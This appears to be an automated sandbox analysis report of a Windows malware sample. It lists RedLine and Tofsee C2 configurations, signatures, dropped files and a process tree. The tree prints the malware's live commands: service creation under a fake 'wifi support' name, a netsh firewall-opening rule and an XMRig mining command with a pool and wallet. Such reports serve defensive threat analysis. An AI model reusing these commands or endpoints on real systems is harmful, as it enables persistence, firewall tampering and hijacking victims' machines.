Analysis

  • max time kernel
    51s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2022 10:21

General

  • Target

    41cea46a44d655ab07e414f88b07260a.exe

  • Size

    170KB

  • MD5

    41cea46a44d655ab07e414f88b07260a

  • SHA1

    6678722fb1a3889b18d7ba42ec509e1f84521dd3

  • SHA256

    ca81d370ff7e2f2b429d2c1ff109a351f66f5bb9799d34c424aaaac684ed59a4

  • SHA512

    795df19ad7f68328ff69715afc3a2511a3828ac114e81a79ca288c19bb41aff1e05b084c4236aaa6825bdf5c53d88fcae7d7433d69660fff8a30f67ea0b80d30

  • SSDEEP

    3072:v8hLpO65z0fJRIA/M3wxyLiBI6Iz/PkW4n:GLp3AabwqpZ

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (Sup: @mr_golds)

C2

77.73.134.27:8163

Attributes
  • auth_value

    56c6f7b9024c076f0a96931453da7e56

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Extracted

Family

redline

Botnet

bog923

C2

jamesmillion.xyz:29329

Attributes
  • auth_value

    1c664a67a69fe1716505fe1fb126f7dd

Signatures

  • Detects Smokeloader packer 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\41cea46a44d655ab07e414f88b07260a.exe
    "C:\Users\Admin\AppData\Local\Temp\41cea46a44d655ab07e414f88b07260a.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3060
  • C:\Users\Admin\AppData\Local\Temp\6B7.exe
    C:\Users\Admin\AppData\Local\Temp\6B7.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
        PID:82640
    • C:\Users\Admin\AppData\Local\Temp\A42.exe
      C:\Users\Admin\AppData\Local\Temp\A42.exe
      1⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:40156
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bxwelmns\
        2⤵
          PID:82332
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mrogzsod.exe" C:\Windows\SysWOW64\bxwelmns\
          2⤵
            PID:82420
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description bxwelmns "wifi internet conection"
            2⤵
            • Launches sc.exe
            PID:82604
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create bxwelmns binPath= "C:\Windows\SysWOW64\bxwelmns\mrogzsod.exe /d\"C:\Users\Admin\AppData\Local\Temp\A42.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
            • Launches sc.exe
            PID:82500
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" start bxwelmns
            2⤵
            • Launches sc.exe
            PID:2096
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            2⤵
            • Modifies Windows Firewall
            PID:208
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 40156 -s 660
            2⤵
            • Program crash
            PID:3856
        • C:\Users\Admin\AppData\Local\Temp\E79.exe
          C:\Users\Admin\AppData\Local\Temp\E79.exe
          1⤵
          • Executes dropped EXE
          PID:81196
        • C:\Users\Admin\AppData\Local\Temp\13BA.exe
          C:\Users\Admin\AppData\Local\Temp\13BA.exe
          1⤵
          • Executes dropped EXE
          PID:82236
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4AA==
            2⤵
              PID:2664
            • C:\Users\Admin\AppData\Local\Temp\13BA.exe
              C:\Users\Admin\AppData\Local\Temp\13BA.exe
              2⤵
                PID:5152
            • C:\Users\Admin\AppData\Local\Temp\234B.exe
              C:\Users\Admin\AppData\Local\Temp\234B.exe
              1⤵
              • Executes dropped EXE
              PID:82324
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              1⤵
                PID:82588
              • C:\Users\Admin\AppData\Local\Temp\2D9D.exe
                C:\Users\Admin\AppData\Local\Temp\2D9D.exe
                1⤵
                  PID:82488
                  • C:\Users\Admin\AppData\Local\Temp\bog923.exe.exe
                    "C:\Users\Admin\AppData\Local\Temp\bog923.exe.exe"
                    2⤵
                      PID:1260
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        3⤵
                          PID:4792
                    • C:\Windows\SysWOW64\bxwelmns\mrogzsod.exe
                      C:\Windows\SysWOW64\bxwelmns\mrogzsod.exe /d"C:\Users\Admin\AppData\Local\Temp\A42.exe"
                      1⤵
                        PID:3692
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe
                          2⤵
                            PID:1836
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
                              3⤵
                                PID:1144
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 516
                              2⤵
                              • Program crash
                              PID:4472
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:1516
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 40156 -ip 40156
                              1⤵
                                PID:4576
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:3636
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3692 -ip 3692
                                  1⤵
                                    PID:4308
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    1⤵
                                      PID:4820
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      1⤵
                                        PID:2600
                                      • C:\Windows\SysWOW64\explorer.exe
                                        C:\Windows\SysWOW64\explorer.exe
                                        1⤵
                                          PID:528
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          1⤵
                                            PID:4072
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe
                                            1⤵
                                              PID:4840
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              1⤵
                                                PID:4372

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Persistence

                                              New Service

                                              1
                                              T1050

                                              Modify Existing Service

                                              1
                                              T1031

                                              Privilege Escalation

                                              New Service

                                              1
                                              T1050

                                              Discovery

                                              Query Registry

                                              2
                                              T1012

                                              System Information Discovery

                                              3
                                              T1082

                                              Peripheral Device Discovery

                                              1
                                              T1120

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\13BA.exe.log
                                                Filesize

                                                1KB

                                                MD5

                                                7200fb09b34d23375c2cff85323af4a4

                                                SHA1

                                                0994a0ab70a6f6c8c45b4664bed926779fbd5c2e

                                                SHA256

                                                e065d81294bae8c8404e57ce5d9d4db68472cefac1469e49f2e73671a4315e15

                                                SHA512

                                                417451e2279b9f1861d317edd8a517a7bb6d1e505c23fb89a16662059d23fbd789223b061ea73217d2042a2221f998c093928a28fd6d8054f53fa174f5dd02de

                                              • C:\Users\Admin\AppData\Local\Temp\13BA.exe
                                                Filesize

                                                1.1MB

                                                MD5

                                                ff97413fadad115998666fd129ccb86d

                                                SHA1

                                                152ca9dd31bf0c84f435154727186c8dca441f00

                                                SHA256

                                                6238542631b73f4d10cba3147b1e3326b01bc1f0ebf1cee83423eb2a4c9a6213

                                                SHA512

                                                2fdc2a83645d5764e81612903f6fd10581ba446bf52762f0cadc2b5e51b529dd522548c9545b4825b1924af4dc2556dfb1b3be0f6f94ffe7ef072511ef2f5c40

                                              • C:\Users\Admin\AppData\Local\Temp\13BA.exe
                                                Filesize

                                                1.1MB

                                                MD5

                                                ff97413fadad115998666fd129ccb86d

                                                SHA1

                                                152ca9dd31bf0c84f435154727186c8dca441f00

                                                SHA256

                                                6238542631b73f4d10cba3147b1e3326b01bc1f0ebf1cee83423eb2a4c9a6213

                                                SHA512

                                                2fdc2a83645d5764e81612903f6fd10581ba446bf52762f0cadc2b5e51b529dd522548c9545b4825b1924af4dc2556dfb1b3be0f6f94ffe7ef072511ef2f5c40

                                              • C:\Users\Admin\AppData\Local\Temp\13BA.exe
                                                Filesize

                                                1.1MB

                                                MD5

                                                ff97413fadad115998666fd129ccb86d

                                                SHA1

                                                152ca9dd31bf0c84f435154727186c8dca441f00

                                                SHA256

                                                6238542631b73f4d10cba3147b1e3326b01bc1f0ebf1cee83423eb2a4c9a6213

                                                SHA512

                                                2fdc2a83645d5764e81612903f6fd10581ba446bf52762f0cadc2b5e51b529dd522548c9545b4825b1924af4dc2556dfb1b3be0f6f94ffe7ef072511ef2f5c40

                                              • C:\Users\Admin\AppData\Local\Temp\234B.exe
                                                Filesize

                                                2.7MB

                                                MD5

                                                c0265881059ec2ecf23befda6fb64f9b

                                                SHA1

                                                8b7d0cd04f91bec9d379817c3adf0ddd81b7c544

                                                SHA256

                                                4b774adffc396f00368571a37a58c420ee4b9515c1440e32de91fb1a018acb4b

                                                SHA512

                                                0886c03d4c406eaffc0f60fa04a7e89c3d84feeb969148efc3738200cfec889d0b09cfe1248dfbe064a9472b03726d8ae24b647bf37047758bf06682b5effd57

                                              • C:\Users\Admin\AppData\Local\Temp\234B.exe
                                                Filesize

                                                2.7MB

                                                MD5

                                                c0265881059ec2ecf23befda6fb64f9b

                                                SHA1

                                                8b7d0cd04f91bec9d379817c3adf0ddd81b7c544

                                                SHA256

                                                4b774adffc396f00368571a37a58c420ee4b9515c1440e32de91fb1a018acb4b

                                                SHA512

                                                0886c03d4c406eaffc0f60fa04a7e89c3d84feeb969148efc3738200cfec889d0b09cfe1248dfbe064a9472b03726d8ae24b647bf37047758bf06682b5effd57

                                              • C:\Users\Admin\AppData\Local\Temp\2D9D.exe
                                                Filesize

                                                374KB

                                                MD5

                                                ee71f2a05c3b62cab2cc95fcf5d6f9d0

                                                SHA1

                                                4a7924019c35563c0c66fba54cfab7a1942ef586

                                                SHA256

                                                2342480b1c9e82199a6aafb571ff3925b8de83fe244beede4d478b31a5d1e15d

                                                SHA512

                                                a9eca6a3e7b6ea49a0db6f8ac2d3219cab48d80e42da7cefc944179512e03820d0a0ebf74428208265d9e2595449f5113d1c1d35d74867915ad1fc2d2a95b356

                                              • C:\Users\Admin\AppData\Local\Temp\2D9D.exe
                                                Filesize

                                                374KB

                                                MD5

                                                ee71f2a05c3b62cab2cc95fcf5d6f9d0

                                                SHA1

                                                4a7924019c35563c0c66fba54cfab7a1942ef586

                                                SHA256

                                                2342480b1c9e82199a6aafb571ff3925b8de83fe244beede4d478b31a5d1e15d

                                                SHA512

                                                a9eca6a3e7b6ea49a0db6f8ac2d3219cab48d80e42da7cefc944179512e03820d0a0ebf74428208265d9e2595449f5113d1c1d35d74867915ad1fc2d2a95b356

                                              • C:\Users\Admin\AppData\Local\Temp\6B7.exe
                                                Filesize

                                                2.6MB

                                                MD5

                                                d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8

                                                SHA1

                                                ed7413773b7c9154c9aeed9d173f61577522e0db

                                                SHA256

                                                576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983

                                                SHA512

                                                858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5

                                              • C:\Users\Admin\AppData\Local\Temp\6B7.exe
                                                Filesize

                                                2.6MB

                                                MD5

                                                d5ecc2fd366dbd8d0cd3e9e8c8f5dbd8

                                                SHA1

                                                ed7413773b7c9154c9aeed9d173f61577522e0db

                                                SHA256

                                                576f224909dc7872b8c5bb4902d177f273c8d680c783454b1d43ad46bed7e983

                                                SHA512

                                                858db48785bef29d7d58bf2ff2b7e6c00537e63d2c571741d86ccd293d77abdaa19deab3a68352dae67e650e8da8a20ed7f38e1716af66e589c1c0d58de94bd5

                                              • C:\Users\Admin\AppData\Local\Temp\A42.exe
                                                Filesize

                                                169KB

                                                MD5

                                                ae7f1aa5153b0c9f876dbeb6c031b513

                                                SHA1

                                                92bd27802eacddbf2cceeba53eb54b6ca1ea856f

                                                SHA256

                                                4a19db193094b2a358855deba24ca90126389b1e202ed97c0e581381851abd06

                                                SHA512

                                                d8f0b7ae390efcff0c23d0b7dd74472bc0ae821f348599615ec74f4ea8263efd5db90e0c0bc8db9b0066b23be4de54b522b6b6e7a518c3191a0436330abcfb1f

                                              • C:\Users\Admin\AppData\Local\Temp\A42.exe
                                                Filesize

                                                169KB

                                                MD5

                                                ae7f1aa5153b0c9f876dbeb6c031b513

                                                SHA1

                                                92bd27802eacddbf2cceeba53eb54b6ca1ea856f

                                                SHA256

                                                4a19db193094b2a358855deba24ca90126389b1e202ed97c0e581381851abd06

                                                SHA512

                                                d8f0b7ae390efcff0c23d0b7dd74472bc0ae821f348599615ec74f4ea8263efd5db90e0c0bc8db9b0066b23be4de54b522b6b6e7a518c3191a0436330abcfb1f

                                              • C:\Users\Admin\AppData\Local\Temp\E79.exe
                                                Filesize

                                                395KB

                                                MD5

                                                a864c7dcd49506486eb4a15632a34c03

                                                SHA1

                                                6f247530bd632cb53cdc0b7a8c466e2144c16d84

                                                SHA256

                                                dc69e3a17aba90423107dc5915e8a32e76d92aca74323131b36cf9fb144ecdbf

                                                SHA512

                                                71ea6c60927c29d24a5cb992490e0b71b2c5355b01b4de739a44b4fed2b2315eb6b5081ee44c65b71b08f9c5e0d6591b9b6b7e136cb31a47581420bbe92b7a72

                                              • C:\Users\Admin\AppData\Local\Temp\E79.exe
                                                Filesize

                                                395KB

                                                MD5

                                                a864c7dcd49506486eb4a15632a34c03

                                                SHA1

                                                6f247530bd632cb53cdc0b7a8c466e2144c16d84

                                                SHA256

                                                dc69e3a17aba90423107dc5915e8a32e76d92aca74323131b36cf9fb144ecdbf

                                                SHA512

                                                71ea6c60927c29d24a5cb992490e0b71b2c5355b01b4de739a44b4fed2b2315eb6b5081ee44c65b71b08f9c5e0d6591b9b6b7e136cb31a47581420bbe92b7a72

                                              • C:\Users\Admin\AppData\Local\Temp\bog923.exe.exe
                                                Filesize

                                                374KB

                                                MD5

                                                ee71f2a05c3b62cab2cc95fcf5d6f9d0

                                                SHA1

                                                4a7924019c35563c0c66fba54cfab7a1942ef586

                                                SHA256

                                                2342480b1c9e82199a6aafb571ff3925b8de83fe244beede4d478b31a5d1e15d

                                                SHA512

                                                a9eca6a3e7b6ea49a0db6f8ac2d3219cab48d80e42da7cefc944179512e03820d0a0ebf74428208265d9e2595449f5113d1c1d35d74867915ad1fc2d2a95b356

                                              • C:\Users\Admin\AppData\Local\Temp\mrogzsod.exe
                                                Filesize

                                                12.2MB

                                                MD5

                                                3e23c75fc0dfbc341de359a7bcd35da6

                                                SHA1

                                                43e064ab0c18f805da46601fd91558e050d65b41

                                                SHA256

                                                91defb070972cce42338992024daac6a408e00d8c26f8f0628ea974bd9ed1754

                                                SHA512

                                                5de862694c1b4876c49fdec1df181729efd3b6838a3f9ee53f22e221b61b9be8c9bb2258302eab781f769c53a7abe6cd02c5d743c66c9d1d0fed7e86f7f749d5

                                              • C:\Windows\SysWOW64\bxwelmns\mrogzsod.exe
                                                Filesize

                                                12.2MB

                                                MD5

                                                3e23c75fc0dfbc341de359a7bcd35da6

                                                SHA1

                                                43e064ab0c18f805da46601fd91558e050d65b41

                                                SHA256

                                                91defb070972cce42338992024daac6a408e00d8c26f8f0628ea974bd9ed1754

                                                SHA512

                                                5de862694c1b4876c49fdec1df181729efd3b6838a3f9ee53f22e221b61b9be8c9bb2258302eab781f769c53a7abe6cd02c5d743c66c9d1d0fed7e86f7f749d5

                                              • memory/208-186-0x0000000000000000-mapping.dmp
                                              • memory/528-215-0x0000000000810000-0x0000000000819000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/528-214-0x0000000000820000-0x0000000000825000-memory.dmp
                                                Filesize

                                                20KB

                                              • memory/528-212-0x0000000000000000-mapping.dmp
                                              • memory/1144-259-0x0000000000000000-mapping.dmp
                                              • memory/1144-265-0x00000000006A0000-0x0000000000791000-memory.dmp
                                                Filesize

                                                964KB

                                              • memory/1144-260-0x00000000006A0000-0x0000000000791000-memory.dmp
                                                Filesize

                                                964KB

                                              • memory/1260-230-0x0000000000000000-mapping.dmp
                                              • memory/1516-188-0x0000000000C80000-0x0000000000C8F000-memory.dmp
                                                Filesize

                                                60KB

                                              • memory/1516-235-0x0000000000C90000-0x0000000000C99000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/1516-183-0x0000000000000000-mapping.dmp
                                              • memory/1516-187-0x0000000000C90000-0x0000000000C99000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/1664-138-0x0000000000000000-mapping.dmp
                                              • memory/1836-241-0x0000000002400000-0x000000000260F000-memory.dmp
                                                Filesize

                                                2.1MB

                                              • memory/1836-236-0x0000000000680000-0x0000000000695000-memory.dmp
                                                Filesize

                                                84KB

                                              • memory/1836-190-0x0000000000000000-mapping.dmp
                                              • memory/1836-256-0x0000000006FD0000-0x0000000006FD7000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/1836-247-0x0000000002710000-0x0000000002720000-memory.dmp
                                                Filesize

                                                64KB

                                              • memory/1836-244-0x0000000001BF0000-0x0000000001BF6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1836-191-0x0000000000680000-0x0000000000695000-memory.dmp
                                                Filesize

                                                84KB

                                              • memory/1836-250-0x0000000006FC0000-0x0000000006FC5000-memory.dmp
                                                Filesize

                                                20KB

                                              • memory/1836-253-0x0000000007A80000-0x0000000007E8B000-memory.dmp
                                                Filesize

                                                4.0MB

                                              • memory/1836-200-0x0000000000680000-0x0000000000695000-memory.dmp
                                                Filesize

                                                84KB

                                              • memory/2096-182-0x0000000000000000-mapping.dmp
                                              • memory/2600-239-0x0000000000840000-0x0000000000862000-memory.dmp
                                                Filesize

                                                136KB

                                              • memory/2600-210-0x0000000000840000-0x0000000000862000-memory.dmp
                                                Filesize

                                                136KB

                                              • memory/2600-206-0x0000000000000000-mapping.dmp
                                              • memory/2600-211-0x0000000000810000-0x0000000000837000-memory.dmp
                                                Filesize

                                                156KB

                                              • memory/2664-192-0x0000000000000000-mapping.dmp
                                              • memory/2664-217-0x0000000007F70000-0x00000000085EA000-memory.dmp
                                                Filesize

                                                6.5MB

                                              • memory/2664-207-0x00000000061C0000-0x0000000006226000-memory.dmp
                                                Filesize

                                                408KB

                                              • memory/2664-209-0x0000000006920000-0x000000000693E000-memory.dmp
                                                Filesize

                                                120KB

                                              • memory/2664-218-0x0000000006DA0000-0x0000000006DBA000-memory.dmp
                                                Filesize

                                                104KB

                                              • memory/2664-199-0x0000000005AC0000-0x00000000060E8000-memory.dmp
                                                Filesize

                                                6.2MB

                                              • memory/2664-208-0x00000000062E0000-0x0000000006346000-memory.dmp
                                                Filesize

                                                408KB

                                              • memory/2664-196-0x00000000052F0000-0x0000000005326000-memory.dmp
                                                Filesize

                                                216KB

                                              • memory/3060-136-0x00000000022C0000-0x00000000022C9000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/3060-133-0x00000000022C0000-0x00000000022C9000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/3060-132-0x0000000000738000-0x0000000000749000-memory.dmp
                                                Filesize

                                                68KB

                                              • memory/3060-134-0x0000000000400000-0x0000000000585000-memory.dmp
                                                Filesize

                                                1.5MB

                                              • memory/3060-135-0x0000000000738000-0x0000000000749000-memory.dmp
                                                Filesize

                                                68KB

                                              • memory/3060-137-0x0000000000400000-0x0000000000585000-memory.dmp
                                                Filesize

                                                1.5MB

                                              • memory/3636-189-0x0000000000000000-mapping.dmp
                                              • memory/3636-202-0x00000000008F0000-0x00000000008F9000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/3636-237-0x0000000000900000-0x0000000000905000-memory.dmp
                                                Filesize

                                                20KB

                                              • memory/3636-201-0x0000000000900000-0x0000000000905000-memory.dmp
                                                Filesize

                                                20KB

                                              • memory/3692-197-0x0000000000712000-0x0000000000722000-memory.dmp
                                                Filesize

                                                64KB

                                              • memory/3692-198-0x0000000000400000-0x0000000000585000-memory.dmp
                                                Filesize

                                                1.5MB

                                              • memory/4072-216-0x0000000000000000-mapping.dmp
                                              • memory/4072-221-0x0000000000FD0000-0x0000000000FDB000-memory.dmp
                                                Filesize

                                                44KB

                                              • memory/4072-220-0x0000000000FE0000-0x0000000000FE6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/4072-266-0x0000000000FE0000-0x0000000000FE6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/4372-228-0x00000000007E0000-0x00000000007E8000-memory.dmp
                                                Filesize

                                                32KB

                                              • memory/4372-229-0x00000000007D0000-0x00000000007DB000-memory.dmp
                                                Filesize

                                                44KB

                                              • memory/4372-227-0x0000000000000000-mapping.dmp
                                              • memory/4372-268-0x00000000007E0000-0x00000000007E8000-memory.dmp
                                                Filesize

                                                32KB

                                              • memory/4792-240-0x0000000000000000-mapping.dmp
                                              • memory/4792-269-0x0000000000400000-0x0000000000428000-memory.dmp
                                                Filesize

                                                160KB

                                              • memory/4820-204-0x0000000000EA0000-0x0000000000EA6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/4820-205-0x0000000000E90000-0x0000000000E9C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/4820-203-0x0000000000000000-mapping.dmp
                                              • memory/4820-238-0x0000000000EA0000-0x0000000000EA6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/4840-267-0x0000000001240000-0x0000000001247000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/4840-219-0x0000000000000000-mapping.dmp
                                              • memory/4840-223-0x0000000001230000-0x000000000123D000-memory.dmp
                                                Filesize

                                                52KB

                                              • memory/4840-222-0x0000000001240000-0x0000000001247000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/5152-270-0x0000000000000000-mapping.dmp
                                              • memory/5152-271-0x0000000000400000-0x0000000000482000-memory.dmp
                                                Filesize

                                                520KB

                                              • memory/40156-150-0x00000000007B9000-0x00000000007CA000-memory.dmp
                                                Filesize

                                                68KB

                                              • memory/40156-154-0x0000000002080000-0x0000000002093000-memory.dmp
                                                Filesize

                                                76KB

                                              • memory/40156-155-0x0000000000400000-0x0000000000585000-memory.dmp
                                                Filesize

                                                1.5MB

                                              • memory/40156-175-0x00000000007B9000-0x00000000007CA000-memory.dmp
                                                Filesize

                                                68KB

                                              • memory/40156-141-0x0000000000000000-mapping.dmp
                                              • memory/40156-193-0x0000000000400000-0x0000000000585000-memory.dmp
                                                Filesize

                                                1.5MB

                                              • memory/81196-144-0x0000000000000000-mapping.dmp
                                              • memory/82236-156-0x0000000000000000-mapping.dmp
                                              • memory/82236-185-0x0000000008C70000-0x0000000008C92000-memory.dmp
                                                Filesize

                                                136KB

                                              • memory/82236-159-0x0000000000B70000-0x0000000000C94000-memory.dmp
                                                Filesize

                                                1.1MB

                                              • memory/82324-160-0x0000000000000000-mapping.dmp
                                              • memory/82332-161-0x0000000000000000-mapping.dmp
                                              • memory/82420-167-0x0000000000000000-mapping.dmp
                                              • memory/82488-170-0x0000000000000000-mapping.dmp
                                              • memory/82488-177-0x00000000051A0000-0x000000000523C000-memory.dmp
                                                Filesize

                                                624KB

                                              • memory/82488-176-0x0000000005670000-0x0000000005C14000-memory.dmp
                                                Filesize

                                                5.6MB

                                              • memory/82488-174-0x00000000001F0000-0x0000000000254000-memory.dmp
                                                Filesize

                                                400KB

                                              • memory/82488-225-0x0000000005640000-0x000000000564A000-memory.dmp
                                                Filesize

                                                40KB

                                              • memory/82500-171-0x0000000000000000-mapping.dmp
                                              • memory/82588-178-0x0000000000000000-mapping.dmp
                                              • memory/82588-234-0x0000000000AF0000-0x0000000000AF7000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/82588-180-0x0000000000AF0000-0x0000000000AF7000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/82588-181-0x0000000000AE0000-0x0000000000AEB000-memory.dmp
                                                Filesize

                                                44KB

                                              • memory/82604-179-0x0000000000000000-mapping.dmp
                                              • memory/82640-224-0x0000000006D90000-0x0000000006F52000-memory.dmp
                                                Filesize

                                                1.8MB

                                              • memory/82640-169-0x0000000005380000-0x00000000053BC000-memory.dmp
                                                Filesize

                                                240KB

                                              • memory/82640-166-0x00000000051A0000-0x00000000051B2000-memory.dmp
                                                Filesize

                                                72KB

                                              • memory/82640-148-0x0000000000400000-0x0000000000428000-memory.dmp
                                                Filesize

                                                160KB

                                              • memory/82640-164-0x0000000005740000-0x0000000005D58000-memory.dmp
                                                Filesize

                                                6.1MB

                                              • memory/82640-233-0x0000000006F60000-0x0000000006FB0000-memory.dmp
                                                Filesize

                                                320KB

                                              • memory/82640-165-0x0000000005270000-0x000000000537A000-memory.dmp
                                                Filesize

                                                1.0MB

                                              • memory/82640-226-0x0000000007BA0000-0x00000000080CC000-memory.dmp
                                                Filesize

                                                5.2MB

                                              • memory/82640-213-0x0000000005670000-0x0000000005702000-memory.dmp
                                                Filesize

                                                584KB

                                              • memory/82640-147-0x0000000000000000-mapping.dmp
                                              • memory/82640-232-0x0000000006CE0000-0x0000000006D56000-memory.dmp
                                                Filesize

                                                472KB